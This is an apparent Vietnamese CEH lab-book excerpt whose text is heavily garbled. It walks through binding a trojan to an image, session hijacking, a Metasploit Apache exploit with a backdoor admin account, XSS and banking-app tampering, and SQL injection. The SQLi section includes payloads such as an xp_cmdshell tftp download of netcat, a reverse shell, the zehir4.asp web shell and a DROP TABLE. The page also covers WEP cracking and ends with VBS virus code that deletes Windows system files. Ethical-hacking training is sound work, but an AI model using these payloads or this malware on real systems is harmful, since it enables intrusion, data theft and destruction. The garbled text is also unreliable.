1. Trang chủ
  2. » Công Nghệ Thông Tin

CEH lab book tieng viet phan3

47 368 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Giới thiệu Kỹ thuật lừa đảo
Trường học VSIC Education Corporation
Thể loại Tài liệu
Thành phố VN
Định dạng
Số trang 47
Dung lượng 4,45 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Kỹ thuật lừa đảo(Social Engineering) là một thủ thuật được các hacker sử dụng nhiều cho các cuộc xâm nhập vào các hệ thống, mạng máy tính

Trang 1

và m t tr lý c a ông này L i d ng lúc hai ng i đi công tác, anh ta s d ng Call ID gi , nhái gi ng nói c a viên tr lý đ g i đ n qu n tr m ng công ty, yêu c u g i m t kh u đ ng

nh p vào h th ng c a t ng giám đ c vì ngài đã quên m t kh u Qu n tr viên ki m tra m t vài thông tin v "viên tr lý", nh ng Kevin đã có đ thông tin và s khôn ngoan đ tr l i K t

qu là Kevin đã l y đ c m t kh u và ki m soát toàn b h th ng m ng c a công ty X

M t hình th c l a đ o khác: M t ngày x u tr i nào đó, b n nh n đ c đi n tho i,

đ u dây bên kia là m t gi ng nói ng t ngào: "Chào anh, d ch v mà anh đang s d ng t i công ty chúng tôi hi n đang b tr c tr c v i account (tài kho n) c a anh ngh anh g i g p thông tin v tài kho n cho chúng tôi đ đi u ch nh l i" M i nghe qua t ng nh đây là m t

ki u l a thô thi n, nh ng xác su t thành công r t cao, đ c bi t khi gi ng nói đó d th ng nh

m y cô tr c t ng đài 1080! Ph ng cách l a đ o t ng t là dùng k thu t "Fake Email Login" V nguyên t c, m i khi đ ng nh p vào h p th thì chúng ta ph i đi n thông tin tài kho n g m username và password r i g i thông tin đ n mail server đ x lý L i d ng đi u này, hacker đã thi t k các trang đ ng nh p gi (Fake Login) đ các thông tin đ c g i đ n cho h

Tóm l i, k thu t Social Engineering r t đa d ng, phong phú và c ng h t s c nguy

hi m do tính hi u qu và s ph bi n K thu t này không đòi h i ph i s d ng quá nhi u y u

t k thu t, th m chí không có liên quan đ n k thu t thu n túy (non-technical) Hacker có th

th c hi n ph ng cách này thông qua th tín, e-mail, đi n tho i, ti p xúc tr c ti p, thông qua

ng i quen, các m i quan h cá nhân nh m d n d , khai thác các thông tin do vô tình b ti t

l t phía ng i dùng VN, k thu t này còn khá m i nên không hi m tr ng h p b đánh

l a m t cách d dàng Ch ng h n n m ngoái, hàng lo t game th MU Global đã m t s ch sành sanh tài s n ( o), khi ngây th đi n thông tin tài kho n c a mình vào m t e-mail gi m o admin MU c a hacker!

(Trích d n)

II/ Các bài Lab:

Trang 2

th c hi n bài Lab này, ta s d ng ch ng trình Mini-binder đ ghép file trojan v i hình nh, thay đ i icon và ch ng trình Outlook đ g i email n c danh

Ghép file hình nh và file trojan, đ u tiên ta t o 1 file trojan, l y 1 file nh và file ico

b t k đ ghép

Ta s d ng l nh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ ghép file trojan svchost.exe v i cathu.jpg và v i icon là 60.ico

Trang 3

Ta vào ToolåOptionåMail setupåView Accountå Ch n Account c n thay đ i và thay đ i thông tin Your Name và E-mail Address

Ti p theo Attach file đính kèm vào và g i Email đi Trong bài Tác gi g i t i đ a ch email mailtestsniff@yahoo.com, và sau đó check mail đ ki m tra th xem mail đã đ n ch a

Trang 4

gi ta có thêm 1 k thu t n a là session hijacking th c hi n đ c bài lab này tr c tiên ta

ph i s d ng ARP spoof, sau đó s d ng ph n m m T-sight hay Hunt đ giành l y session t

phía máy n n nhân

II/ Th c hi n bài Lab

Trong bài Lab, tác gi s d ng Vmware đ th c hi n, s d ng máy đ th nghi p TELNET và SSH Còn 2 máy còn l i 1 s d ng Window 2000(đã cài s n tool T-sight) và 1 s Linux đ test SSH

Trang 5

Sau khi cài đ t xong, trên máy 192.168.200.1 thi t l p cho phép các máy khác telnet

Và t máy 192.168.200.2 telnet đ n máy 192.168.200.1

Và d li u thu đ c t máy 192.168.200.2, s d ng tính n ng Take Over trong Tool T-sight đ l y session

Trang 6

Sau khi Session b l y, session t máy Telnet s b “ Lost connection” và ng i s

d ng trong tr ng h p này không bi t là mình b “Lost Connection “b i nguyên nhân nào Bây gi ta b t Service SSH c a máy Linux b ng l nh “ Service sshd” và test th session hijacking đ i v i traffic ssh

Trang 7

II/ Th c Hi n bài lab

Bài Lab 1: T n công Web Server Win 2003(l i Apache)

bi t đ c máy Server c a h th ng có b l i hay không, ta s d ng d ng ph n m m quét đ ki m tra (Ph n này đã đ c h c trong scaning)

Trang 8

Ta không th y thông tin v FTP Server đây, do ph n m m Retina ch có tính n ng

nh n di n các Service c a Microsoft và nh ng Service thông d ng Còn các Service không thông d ng h n thì ph n m m ch th y d i d ng m port Trong tr ng h p này ta th y m port 21

Ta s d ng Metasploit đ khai thác l i Apache và l y đ c (Console)

13 Apache mod_alias and mod_rewrite Buffer Overflow 1

Trang 9

Bây gi chúng ta s tìm cách Remote Desktop vào máy 192.168.200.1 Tr c tiên ta

t o 1 user và add user này vào nhóm admin b ng s d ng l nh

Net user vsichao vsichao /add

Net Localgroup Administrators vsichao /add

//đ a user vào nhóm Admin

Ta có th ki m ta l i b ng l nh “ Net user” đ ki m tra th user c a mình đã đ c quy n admin hay ch a

Ti p theo ta th remote Desktop vào máy b ng l nh “ mstsc /v 192.168.200.6” N u không đ c ta s d ng file Openrdp.vbs đ m Remote Desktop Ta s d ng ch ng trình Cisco TFTP Server đ đ y file này Server n n nhân

Trang 10

Add user vào và nâng quy n lên Administrator

Remote Desktop vào v i user là cehclass thành công, nh v y ta đã hoàn toàn ki m soát đ c máy n n nhân

Trang 11

Bài lab 2: Khai thác l i ng d ng Server U

T ng t nh bài trên, ta s d ng ch ng trinh nmap đ xác đ nh version c a ServerU

và s d ng metaesploit đ t n công

Trang 12

II/ Các Bài Lab

Bài Lab 1: Cross Site Scripting

u tiên ta login vào b ng username “jv” và password “ jv789” và ch n ch c n ng

“post message” Sau đó ta post script vào ph n message text

Trang 13

Sau đó ta submit đ post script này lên Ta s d ng F5 đ Refresh l i trình duy t và

th y xu t hi n

Lúc này trình duy t c a n n nhân vô tình đã th c hi n script đ c user post lên Server

D a vào script này, tin t c có th n c p cookie c a n n nhân và log in vào h th ng

Bài Lab 2: Insufficient Data Validation

Trong bài Lab này khi chuy n ti n t tài kho n này sang tài s n khác, tham s amout luôn luôn ph i l n h n 0 Tuy nhiên trong 1 s tr ng h p Hacker có th thay đ i con s này

là s âm b ng nh ng ch ng trình “http proxy” K t qu này có th gây h i đ n các kho n tài chính c a ngân hàng HackmeBank

Ta th chuy n v i giá tr Amout 100 t tài kho n b t k sang tài kho n khác

K t qu thành công Ta ti p t c chuy n thêm 1 l n n a nh ng v i giá tr là -100 Tuy nhiên do có ki m tra d i phía client nên vi c chuy n ti n không thành công

Trang 14

Bây gi ta s d ng ch ng trình Webscarab làm http proxy và thay đ i thông s đ c POST lên Server

K t qu tr v t Server vi c chuy n ti n v n thành công

Trang 15

Ta ki m tra trong Transaction th y có l u l i vi c chuy n ti n

Bài Lab 3: Cookie Manipulation

Trong lúc login, ta xem trong Cookie có tham s CookieloginAttempts, tham s này dùng đ lock session khi ai đó c g ng login vào khi nh p sai hay không bi t password Tham

s này đ m t 5 đ n 0 Khi tham s này b ng 0 là lúc session b Lock Ta có th s d ng Webscarab đ thay đ i tham s này đ tránh vi c Server lock session

Trang 16

Bài Lab 4: Authorization Failure

u tiên ta vào xem các account c a user “jc” password “jc789”

Ta th y account Number là 5204320422040005, 5204320422040006, 520432

0422040007, 5204320422040008 User jc ch quán lý đ c các account thông s trên Tuy nhiên ta chú ý đ n ph n URL khi s d ng tính n ng “View Transaction”

Trang 18

Bài 11:

SQL INJECTION

I/ Gi i thi u v SQL Injection:

ây là K thu t t n công này l i d ng nh ng l h ng trên ng d ng(không ki m tra k

nh ng kí t nh p t ng i dùng) Th c hi n b ng cách thêm các mã vào các câu l nh hay câu truy v n SQL (thông qua nh ng textbox) tr c khi chuy n cho ng d ng web x lý, Server s

th c hi n và tr v cho trình duy t (k t qu câu truy v n hay nh ng thông báo l i) nh đó mà các tin t c có th thu th p d li u, ch y l nh (trong 1 s tr ng h p) và sau cho có th chi m

đ c quy n ki m soát c a h th ng Sau đây là 1 s th thu t c n b n

1) L y tên table và column hi n hành:

Trang 19

username: ' Union select VPASS from VTABLE where VUSER='admin' (1)

password: everything

(1): Trong tr ng h p này admin là m t user mà b n bi t n u không có th b tr ng, nó s cho b n user đ u tiên

KQ: -

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement

containing a UNION operator must have an equal number of expressions in their target lists -

N u KQ ra nh trên có ngh a là b n ph i union thêm nhi u column n a đ t t c column c a table VTABLE đ c Union h t Structure c a nó nh sau:

username: ' Union select VPASS,1,1,1 1,1 from VTABLE where VUSER='admin' (1) password: everything

B n hãy thêm ",1" cho đ n khi k t qu ra đ i lo i nh

-

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int

-

Nh v y Pass c a user 'admin' là 'tuibihackroi'

2) L y h t value c a m t column đã bi t trong m t table đã bi t

Bí quy t đây là “Not in” Structure c a nó nh sau (s d ng ví d v i column c a bài tr c):

V i Vuser là admin ta có th l y đ c các user khác

**** Ð l y danh sách tên các user theo m t quy đ nh mà b n ch n, ví d chi l y các user có

ch a t admin ch ng h n ta dùng “like”: c u trúc

-Login Page::::::

username: ‘ Union select Vuser,1,1,1…,1 from Vtable where username not in (‘admin’) like

%admin%—

Trang 20

TABLE_NAME (ch a toàn b table) và table: INFORMATION_SCHEMA.COLUMNS v i column COLUMN_NAME (ch a toàn b column)

username: ‘ UNION SELECT COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’… ’ and ……

L u ý: N u các b n s d ng không đ c thì có th vì d u + không đ c ch p nh n, lúc đó hãy thay nó === %2b

vd: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))

5) Run command SQL:

Trang 21

login page:::::

user:' ; [command]

-

vd: '; DROP TABLE VTABLE

II/ Th c Hành Bài Lab

Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web đ t n công vào Server 2000(192.168.1.46) và s upload lên Server 2000 trojan webbase, sau đó ki m soát Server này

u tiên s d ng ph n m m Acunetix đ quét xem Server Web có b l i ng d ng gì không??

Trang 22

Ta có th test b ng tay trong tình hu ng này b ng cách thêm d u “ ‘ “ trong form login

Sau đây là 1 s đo n mã đ l y thông tin v Server khi bi t Server b l i SQL

1/lay ten Server name

'and 1=convert(int,@@servername) sp_password

2/lay database name

Trang 23

4/'and 1=convert(int,@@version) sp_password

5/Lay thong tin table userinfo

' having 1=1 (xem table hien hanh)

' group by userinfo.username having 1=1 (xem column tiep theo)

Sau khi l y thông tin v Server, Hacker th upload lên Server trojan netcat b ng cách

s d ng g i hàm shell trong SQL và tftp Ta đánh vào form login câu l nh sau(ph i nh là máy client s d ng TFTP Server):

';exec master xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";

Câu l nh này đ c th c thi h th ng Server thông qua SQL, nó s load nc123.exe t TFTP Server 192.168.1.44 Ta ki m tra trên TFTP Server file đã đ c g i hay ch a

Sau khi upload thành công trojan netcat, vi c bây gi là ta ph i ch y nó và s d ng telnet ng c ra bên ngoài Vì lúc này chúng ta đang đ ng sau Firewall nên không th l ng nghe trên port vì client ngoài Firewall không th connect vào đ c

Ch y l ng nghe phía Client

Trang 24

Telnet net ng c ra ngoài t Server

Và k t n i netcat đ c hình thành sau khi telnet ng c ra t Server, lúc này chúng ta

đã by pass đ c Firewall

Trang 25

Sau khi k t n i đ c màn hình console c a Window, ta ti p t c upload thêm 1 trojan

d i d ng web thông qua TFTP

Trojan web mà chúng ta s d ng là zehir4.asp, đây là trojan khá nhi u ti n d ng T trojan này ta có th th c hi n d dàng vi c xóa Database, vi c download các file t Server

2000 v máy c a mình thông qua Port Web

Trang 26

L y database

Thay đ i hình n n c a trang web(deface)

Trang 27

Tóm l i l i SQL Injection không nh ng giúp Hacker có nhi u thông tin v table, column mà có th cho phép Hacker s d ng nh ng l nh th c thi h th ng(trong 1 s tr ng

h p) và có th upload trojan vào h th ng Server

Trang 28

m ng không dây 802.11 đ a ra các khóa WEP 64 bit nh ng đ c cung c p thêm khóa WEP

128 bit 802.11 không đ a ra các khóa đ c x p x p nh th nào M t WEP bao g m 2 ph n: vector kh i t o (IV) 24 bit và key m t IV đ c phát trong plain text ph n header c a các gói 802.11 Tuy nhiên nó r t d b “crack” Vì v y gi i pháp ti p theo là ph i s d ng các khóa WEP đ ng mà có th thay đ i m t cách th ng xuyên

Chu n 802.11 xác nh n các máy khách s d ng khóa WEP Ti p sau đó chu n công nghi p đã

đ c đ a ra thông qua xác nh n 802.1x đ b sung cho các thi u xót c a chu n 802.11 tr c

nó Tuy nhiên g n đây, tr ng đ i h c Maryland đã minh ch ng b ng tài li u v s c c a v n

đ b o m t ti m n v i giao th c 802.1x này Gi i pháp ngày nay là s d ng s xác nh n l n nhau đ ng n c n “ai đó gi a” t n công và các khóa WEP đ ng, các khóa này đ c x p x p

m t cách c n th n và các kênh mã hóa C hai k thu t này đ c h tr b i giao th c (TLS:

Transport Layer Security) N i b t h n c là vi c khóa per-packet và ki m tra tính toàn v n

c a message ây chính là chu n b o m t 802.11i

II/ Th c hành bài Lab:

th c hành bài lab Crack Wep key, chúng ta ph i có Card m ng h tr vi c thu các packet và g i nh ng gói de-authen ng c l i Access-point, đ ng th i phiên b n Linux hay Window ph i h tr vi c k t n i đ n driver c a Card m ng wifi Trong khuôn kh th c hành bài Crack Wep key, do s d ng Card Wifi không h tr tính n ng g i gói de-authen, arp đ n access point, tác gi c g ng t o ra traffic đ có th thu đ packet sau đó tính toán ra đ c WEP key(vi c tính toán ph thu c vào Packet nh n đ c t Access-point)

Tr c tiên ta ph i t i ch ng trình Crack t http://www.aircrack-ng.org/, trong ph n

m m này, ta s d ng airdump đ thu packet, aircrack đ b khóa WEP Key

Ti p theo ta download driver cho Card m ng(không ph i driver c a chính hãng và driver đ c vi t riêng), đây tác gi s d ng Card Wifi NetGear WG511T

www.wildpackets.com/support/hardware/atheros30_driver i v i Cisco Aironet ta c ng download driver t trang web này Sau đó ta ti n hành cài đ t cho Card Wifi

Trang 29

Ti p theo ta s d ng Airdump đ thu packet t Access Point

Trang 30

Ta gi l p traffic b ng cách chép 1 d li u l n ch y thông qua Access-Point i v i card m ng h tr ta hoàn toàn có th ch đ ng vi c này

Và lúc này ta th y s l ng packet nh n đ c t card m ng wifi r t nhanh Ta đ i kho ng 20 phút(đ i v i WEP key 64 bit) cho đ n khi packet kho ng t 200 000 đ n 300 000

và s d ng Airdump đ l y WEP key

Trang 31

Ta có th th y đ c WEP đã đ c tìm th y là Athen T ng t nh v y đ i v i WEP key 128 bit, nh ng th i gian ch s lâu h n

WEP key 128 bit

Trang 32

Bài 13:

VIRUS

I/ Gi i thi u: (tham kh o bài đ c thêm)

II/ Th c hành Lab:

Bài 1: Virus phá h y d li u máy

Ta có th vi t d dàng 1 virus phá h y máy b ng nh ng hàm Format hay delete trong ngôn ng VBS nh sau:

msgbox"Error !"

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs" Set vip_xinh2= CreateObject("WScript.Shell")

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*", True

fso.DeleteFolder vic & "*", True

End Sub

On Error Resume Next

Const vic1 = "C:\windows\"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")

fso1.DeleteFile vic1 & "*.*", True

fso1.DeleteFolder vic1 & "*", True

Ngày đăng: 08/08/2013, 17:24

TỪ KHÓA LIÊN QUAN

w